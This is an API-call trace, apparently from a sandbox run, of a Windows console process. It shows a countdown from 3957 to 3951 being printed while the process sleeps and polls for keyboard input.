[0128.350] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdc
[0128.350] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083957") returned 8
[0128.350] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0128.351] __iob_func () returned 0x757a2900
[0128.351] _fileno (_File=0x757a2920) returned 1
[0128.351] _errno () returned 0x5507d8
[0128.351] _get_osfhandle (_FileHandle=1) returned 0x4c
[0128.351] _errno () returned 0x5507d8
[0128.351] GetFileType (hFile=0x4c) returned 0x2
[0128.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0128.351] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0128.351] lstrlenW (lpString="\x08\x08\x08\x083957") returned 8
[0128.351] GetConsoleOutputCP () returned 0x1b5
[0128.351] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083957", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0128.351] GetConsoleOutputCP () returned 0x1b5
[0128.351] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083957", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083957", lpUsedDefaultChar=0x0) returned 8
[0128.351] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0128.352] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0128.352] Sleep (dwMilliseconds=0x64)
[0128.537] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0128.537] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdc
[0128.537] Sleep (dwMilliseconds=0x64)
[0128.724] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0128.725] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdc
[0128.725] Sleep (dwMilliseconds=0x64)
[0128.927] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0128.927] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdc
[0128.927] Sleep (dwMilliseconds=0x64)
[0129.114] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0129.115] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdc
[0129.115] Sleep (dwMilliseconds=0x64)
[0129.302] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0129.302] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdd
[0129.302] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083956") returned 8
[0129.302] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0129.302] __iob_func () returned 0x757a2900
[0129.302] _fileno (_File=0x757a2920) returned 1
[0129.302] _errno () returned 0x5507d8
[0129.302] _get_osfhandle (_FileHandle=1) returned 0x4c
[0129.302] _errno () returned 0x5507d8
[0129.302] GetFileType (hFile=0x4c) returned 0x2
[0129.302] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0129.302] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0129.302] lstrlenW (lpString="\x08\x08\x08\x083956") returned 8
[0129.302] GetConsoleOutputCP () returned 0x1b5
[0129.303] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083956", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0129.303] GetConsoleOutputCP () returned 0x1b5
[0129.303] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083956", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083956", lpUsedDefaultChar=0x0) returned 8
[0129.303] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0129.303] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0129.303] Sleep (dwMilliseconds=0x64)
[0129.489] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0129.489] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdd
[0129.489] Sleep (dwMilliseconds=0x64)
[0129.676] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0129.676] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdd
[0129.676] Sleep (dwMilliseconds=0x64)
[0129.863] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0129.864] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdd
[0129.864] Sleep (dwMilliseconds=0x64)
[0130.050] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.051] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdd
[0130.051] Sleep (dwMilliseconds=0x64)
[0130.222] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.223] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0130.223] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083955") returned 8
[0130.223] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0130.223] __iob_func () returned 0x757a2900
[0130.223] _fileno (_File=0x757a2920) returned 1
[0130.223] _errno () returned 0x5507d8
[0130.223] _get_osfhandle (_FileHandle=1) returned 0x4c
[0130.223] _errno () returned 0x5507d8
[0130.223] GetFileType (hFile=0x4c) returned 0x2
[0130.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0130.223] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0130.223] lstrlenW (lpString="\x08\x08\x08\x083955") returned 8
[0130.223] GetConsoleOutputCP () returned 0x1b5
[0130.223] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083955", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0130.223] GetConsoleOutputCP () returned 0x1b5
[0130.223] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083955", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083955", lpUsedDefaultChar=0x0) returned 8
[0130.223] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0130.224] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0130.224] Sleep (dwMilliseconds=0x64)
[0130.332] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.332] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0130.332] Sleep (dwMilliseconds=0x64)
[0130.472] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.472] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0130.472] Sleep (dwMilliseconds=0x64)
[0130.612] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.612] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0130.612] Sleep (dwMilliseconds=0x64)
[0130.721] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.721] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0130.721] Sleep (dwMilliseconds=0x64)
[0130.830] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.831] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0130.831] Sleep (dwMilliseconds=0x64)
[0130.940] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0130.940] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0130.940] Sleep (dwMilliseconds=0x64)
[0131.049] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.049] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0131.049] Sleep (dwMilliseconds=0x64)
[0131.158] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.158] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fde
[0131.159] Sleep (dwMilliseconds=0x64)
[0131.267] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.268] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0131.268] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083954") returned 8
[0131.268] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0131.268] __iob_func () returned 0x757a2900
[0131.268] _fileno (_File=0x757a2920) returned 1
[0131.268] _errno () returned 0x5507d8
[0131.268] _get_osfhandle (_FileHandle=1) returned 0x4c
[0131.268] _errno () returned 0x5507d8
[0131.268] GetFileType (hFile=0x4c) returned 0x2
[0131.268] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0131.268] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0131.268] lstrlenW (lpString="\x08\x08\x08\x083954") returned 8
[0131.268] GetConsoleOutputCP () returned 0x1b5
[0131.268] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083954", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0131.268] GetConsoleOutputCP () returned 0x1b5
[0131.268] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083954", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083954", lpUsedDefaultChar=0x0) returned 8
[0131.268] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0131.269] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0131.269] Sleep (dwMilliseconds=0x64)
[0131.377] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.377] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0131.377] Sleep (dwMilliseconds=0x64)
[0131.486] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.486] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0131.486] Sleep (dwMilliseconds=0x64)
[0131.595] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.595] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0131.595] Sleep (dwMilliseconds=0x64)
[0131.704] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.705] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0131.705] Sleep (dwMilliseconds=0x64)
[0131.814] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.814] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0131.814] Sleep (dwMilliseconds=0x64)
[0131.923] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0131.923] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0131.923] Sleep (dwMilliseconds=0x64)
[0132.032] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.032] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0132.032] Sleep (dwMilliseconds=0x64)
[0132.141] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.141] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fdf
[0132.141] Sleep (dwMilliseconds=0x64)
[0132.250] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.250] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0132.250] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083953") returned 8
[0132.250] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0132.251] __iob_func () returned 0x757a2900
[0132.251] _fileno (_File=0x757a2920) returned 1
[0132.251] _errno () returned 0x5507d8
[0132.251] _get_osfhandle (_FileHandle=1) returned 0x4c
[0132.251] _errno () returned 0x5507d8
[0132.251] GetFileType (hFile=0x4c) returned 0x2
[0132.251] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0132.251] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0132.251] lstrlenW (lpString="\x08\x08\x08\x083953") returned 8
[0132.251] GetConsoleOutputCP () returned 0x1b5
[0132.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083953", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0132.251] GetConsoleOutputCP () returned 0x1b5
[0132.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083953", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083953", lpUsedDefaultChar=0x0) returned 8
[0132.251] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0132.251] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0132.251] Sleep (dwMilliseconds=0x64)
[0132.361] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.361] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0132.361] Sleep (dwMilliseconds=0x64)
[0132.469] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.469] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0132.469] Sleep (dwMilliseconds=0x64)
[0132.578] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.578] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0132.578] Sleep (dwMilliseconds=0x64)
[0132.696] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.696] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0132.696] Sleep (dwMilliseconds=0x64)
[0132.796] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.797] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0132.797] Sleep (dwMilliseconds=0x64)
[0132.905] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0132.906] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0132.906] Sleep (dwMilliseconds=0x64)
[0133.015] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.015] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0133.015] Sleep (dwMilliseconds=0x64)
[0133.124] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.124] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe0
[0133.124] Sleep (dwMilliseconds=0x64)
[0133.233] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.233] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.233] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083952") returned 8
[0133.233] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0133.233] __iob_func () returned 0x757a2900
[0133.233] _fileno (_File=0x757a2920) returned 1
[0133.234] _errno () returned 0x5507d8
[0133.234] _get_osfhandle (_FileHandle=1) returned 0x4c
[0133.234] _errno () returned 0x5507d8
[0133.234] GetFileType (hFile=0x4c) returned 0x2
[0133.234] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0133.234] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0133.234] lstrlenW (lpString="\x08\x08\x08\x083952") returned 8
[0133.234] GetConsoleOutputCP () returned 0x1b5
[0133.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083952", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0133.234] GetConsoleOutputCP () returned 0x1b5
[0133.234] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083952", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083952", lpUsedDefaultChar=0x0) returned 8
[0133.234] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0133.234] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0133.234] Sleep (dwMilliseconds=0x64)
[0133.342] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.343] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.343] Sleep (dwMilliseconds=0x64)
[0133.451] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.452] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.452] Sleep (dwMilliseconds=0x64)
[0133.561] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.561] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.561] Sleep (dwMilliseconds=0x64)
[0133.670] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.670] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.670] Sleep (dwMilliseconds=0x64)
[0133.779] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.780] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.780] Sleep (dwMilliseconds=0x64)
[0133.888] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.888] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.888] Sleep (dwMilliseconds=0x64)
[0133.997] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0133.997] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0133.997] Sleep (dwMilliseconds=0x64)
[0134.107] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.107] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0134.107] Sleep (dwMilliseconds=0x64)
[0134.216] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.216] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe1
[0134.216] Sleep (dwMilliseconds=0x64)
[0134.325] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0134.325] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fe2
[0134.325] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083951") returned 8
[0134.325] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0134.325] __iob_func () returned 0x757a2900
[0134.325] _fileno (_File=0x757a2920) returned 1
[0134.325] _errno () returned 0x5507d8
[0134.325] _get_osfhandle (_FileHandle=1) returned 0x4c
[0134.325] _errno () returned 0x5507d8
[0134.325] GetFileType (hFile=0x4c) returned 0x2
[0134.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0134.326] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0134.326] lstrlenW (lpString="\x08\x08\x08\x083951") returned 8
[0134.326] GetConsoleOutputCP () returned 0x1b5
